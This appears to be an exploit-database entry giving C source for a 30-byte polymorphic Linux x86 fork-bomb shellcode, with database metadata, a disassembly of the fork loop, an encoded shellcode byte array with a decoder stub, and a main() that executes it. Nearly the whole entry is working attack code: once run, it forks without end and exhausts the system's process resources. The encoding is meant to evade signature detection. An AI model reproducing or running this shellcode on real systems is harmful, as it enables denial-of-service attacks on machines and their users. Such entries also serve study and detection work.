Linux/x86 - Fork Bomb + Polymorphic Shellcode (30 bytes)
Author: Jonathan Salwan
type:
platform: linux_x86
port: 30.0
date_added: 2010-04-20
date_updated: 2017-07-04
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
/*
Title: Linux x86 polymorphic forkbombe - 30 bytes
Author: Jonathan Salwan <submit@shell-storm.org>
Web: http://www.shell-storm.org
! Database of shellcodes: http://www.shell-storm.org/shellcode/
Disassembly of section .text:
08048054 <_a>:
8048054: b0 02 mov $0x2,%al
8048056: cd 80 int $0x80
8048058: eb fa jmp 8048054 <_a>
*/
#include <stdio.h>
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x06\x80"
"\x6c\x0e\xff\x01\x80\xe9\x01\x75"
"\xf6\xeb\x05\xe8\xea\xff\xff\xff"
"\xb1\x03\xce\x81\xec\xfb";
int main()
{
fprintf(stdout,"Lenght: %d\n",strlen(shellcode));
(*(void (*)()) shellcode)();
}